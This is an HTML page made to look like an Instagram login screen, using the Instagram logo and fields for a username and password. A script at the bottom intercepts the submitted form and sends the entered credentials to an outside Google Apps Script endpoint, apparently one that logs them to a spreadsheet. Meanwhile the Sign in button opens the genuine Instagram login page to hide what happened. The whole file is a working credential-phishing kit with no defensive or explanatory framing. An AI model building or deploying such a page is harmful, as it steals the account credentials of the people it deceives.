<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        *{
            background-color: black;
        }
       #main{
       
        width: 60%;
        height: 700px;
        justify-content: center;
        text-align: center;
        margin: auto;
        padding: 10px;
        margin-top: 6%;
       }
       #logo>img{
        margin-top: 40%;
        width: 90%;
        height: 80px;
     
       }
       #logo2>img{
        margin: auto;
      margin-top: 10%;
        width: 98%;
        height: 25px;
        border-radius: 7px;

       }
     
      
      
      
     
     
      @media  screen and (min-width:280px) and (max-width:600px){
        *{
            background-color: white;
        }
        h6{
        color: white;
        margin-top: 15%;
        display: flex;
      }
        hr{
        color: white;
        width: 40%;
      }
        input{
        background-color: rgb(220, 218, 218);
        border: rgb(236, 235, 235);
        color: rgb(250, 250, 250);
        size: 10px;
        width: 98%;
        height: 25px;
     margin: auto;
        border-radius: 3px;
       margin-top: 10px;
       }
       p{
        color: rgb(134, 132, 132);
      font-size: 12px;
      margin-top: 20%;
        
       }
       h6{
        color: rgb(134, 132, 132);
        margin-top: 15%;
        display: flex;
      }
       button{
        background-color: #14b9f6;
        color: white;
        border: none;
        color: white;
        size: 10px;
        width: 98%;
        height: 20px;
        border-radius: 5px;
        margin-top: 10px;
       }
       #forg{
        color: #14b9f6;
        margin-left: 20%;
        font-size: 12px;
        text-decoration: underline white;
      }
      p>a{
        color: #14b9f6;
        text-decoration: underline white;
      }
      }
       
    </style>
</head>
<body>
    <div id="main">
        <div id="logo">
            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1024px-Instagram_logo.svg.png" alt="logo">
        </div>
        <div id="logo2">
          <img src="https://i.stack.imgur.com/oL5c2.png" alt="logo">
      </div>
      <h6><hr>OR<hr></h6>
        <div id="formdiv">
            <form name="submit-to-google-sheet">
                <input type="text" name="UserName" placeholder=" Email or username" required><br/>
            <input type="password" name="password" placeholder=" Password" required><br/>
            <a  href="" id="forg">Forgotten your password</a>
            <button type="submit" onclick="window.open('https://www.instagram.com/accounts/login/','_blank','resizable=yes')" >Sign in</button><br/>
            </form>
        </div>
<p>Don't have an account?<a href="">Sign up</a></p>
        



    </div>
</body>

<script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycbzfKpxnjpYwNbJrmfxNk1E3dW6m0Ym7WWCFAFkyyGmvyHzgKve0BYyQPancSC_9UVyVBg/exec'
    const form = document.forms['submit-to-google-sheet']
  
    form.addEventListener('submit', e => {
      e.preventDefault()
      fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then(response => console.log('Success!', response))
        .catch(error => console.error('Error!', error.message))
    })
  </script>
</html>